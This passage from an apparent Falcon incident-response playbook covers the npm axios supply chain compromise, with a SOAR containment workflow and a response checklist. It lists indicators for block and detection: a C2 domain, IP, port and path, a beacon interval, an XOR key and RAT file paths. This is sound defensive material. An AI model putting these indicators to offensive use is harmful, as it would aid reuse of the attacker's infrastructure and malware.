Enable Interpreter Only or Script Control on developer workstations where possible, but be precise about what they cover. These settings monitor the Windows script hosts (PowerShell, wscript/cscript, mshta and similar), so they catch a dropper that shells out to PowerShell or cscript. node.exe is not a script host they inspect; JavaScript that node executes from node_modules/ is seen through process, file and network telemetry and the Custom IOAs in Section 3, not through script control.


Section 9: Fusion SOAR — Automated Response Workflow#

If your Falcon tier includes Fusion SOAR, deploy this workflow to automate the initial response steps for future npm supply chain events.

Workflow Logic#

Trigger: Custom IOA Detection (SUPPLY-CHAIN-001 or SUPPLY-CHAIN-002)
  → Step 1: Get Host Details (aid, hostname, IP, OS)
  → Step 2: Apply Network Containment
  → Step 3: Create Incident (Severity: Critical, Assignment: SOC)
  → Step 4: Notify Slack/Teams: "Supply chain IOA triggered on [hostname] — auto-contained"
  → Step 5: Open RTR session, run platform-specific audit script
  → Step 6: Attach RTR output to incident
  → Step 7: Await analyst approval before releasing containment

This ensures that any future postinstall-based supply chain attack triggering these IOA rules results in immediate host isolation with zero manual delay.


Quick Reference: IOC Summary#

| Indicator | Type | Value | Action |
|---|---|---|---|
| Malicious package | npm version | axios@1.14.1 | Remove, downgrade |
| Malicious package | npm version | axios@0.30.4 | Remove, downgrade |
| Injected dependency | npm package | plain-crypto-js@4.2.1 | Remove |
| C2 domain | Domain | sfrclak.com | Block + Detect |
| C2 IP | IPv4 | 142.11.206.73 | Block + Detect |
| C2 port | Port | 8000 | Monitor/Block |
| C2 endpoint | URL path | /6202033 | Reference |
| Beacon interval | Behavior | 60 seconds HTTP POST | Hunt pattern |
| XOR key | String | OrDeR_7077 (constant: 333) | YARA/script scanning |
| RAT artifact | File (Windows) | %PROGRAMDATA%\wt.exe | Delete, hash-block |
| RAT artifact | File (Linux) | /tmp/ld.py | Delete, hash-block |
| RAT artifact | File (macOS) | /Library/Caches/com.apple.act.mond | Delete, hash-block |
| Attacker email | Identity | ifstap@proton.me | Reference |
| Compromised account | npm user | jasonsaayman | Reference |

Response Checklist#

Immediate (0–2 hours)#

  • Run Query 7 (Full Compromise Assessment) across all endpoints
  • Add sfrclak.com and 142.11.206.73 to IOC Management as Block
  • Network-contain any hosts where C2 connections or RAT artifacts were found
  • Alert SOC and initiate P1 incident if any hosts are confirmed compromised

Short-Term (2–24 hours)#

  • Deploy Custom IOA rule group (Section 3) to all prevention policies
  • Run npm remediation commands on all developer and CI/CD systems
  • Begin credential rotation for all affected environments
  • Run RTR cleanup on contained hosts
  • Release containment only after cleanup and credential rotation confirmed

Ongoing#

  • Enable Fusion SOAR workflow (Section 9) for automated future response
  • Update Prevention Policy settings per Section 8
  • Add file hashes of recovered RAT artifacts to IOC Management
  • Review npm token hygiene and enforce token scoping/expiry policy
  • Schedule dependency audit cadence (weekly npm audit in CI pipeline)

Created: 2026-04-01
Last modified: 2026-04-01